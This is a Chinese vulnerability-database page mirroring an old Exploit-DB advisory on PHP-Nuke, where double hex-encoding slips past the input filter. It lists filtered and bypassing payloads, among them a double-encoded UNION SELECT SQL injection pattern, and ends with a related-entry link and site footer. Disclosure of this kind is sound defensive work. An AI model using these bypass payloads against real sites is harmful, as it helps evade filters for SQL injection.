PHP-Nuke 0-7 – Double Hex Encoded Input Validation

PHP-Nuke 0-7 – Double Hex Encoded Input Validation

漏洞ID 1055096 漏洞类型
发布时间 2005-05-09 更新时间 2005-05-09
图片[1]-PHP-Nuke 0-7 – Double Hex Encoded Input Validation-安全小百科CVE编号 N/A
图片[2]-PHP-Nuke 0-7 – Double Hex Encoded Input Validation-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25635
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13557/info

PHP Nuke is prone to an input validation vulnerability. Reports indicate the script fails to correctly identify potentially dangerous characters when the characters are double hex-encoded (i.e. %25%41 == %41 == A).

A remote attacker may exploit this issue to bypass PHP Nuke protections and exploit issues that exist in the underlying PHP Nuke installation. 

Will be filtered:
'modules.php?FistFucker=()'

Will be bypassed:
'modules.php?FistFucker=%2528%2529'


Will be filtered:
'/**/UNION/**/SELECT/**/'

Will be bypassed:
'/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/'

相关推荐: Plug and Play Web Server 1.0 002c – Directory Traversal

Plug and Play Web Server 1.0 002c – Directory Traversal 漏洞ID 1054173 漏洞类型 发布时间 2003-09-18 更新时间 2003-09-18 CVE编号 N/A CNNVD-ID N/A 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享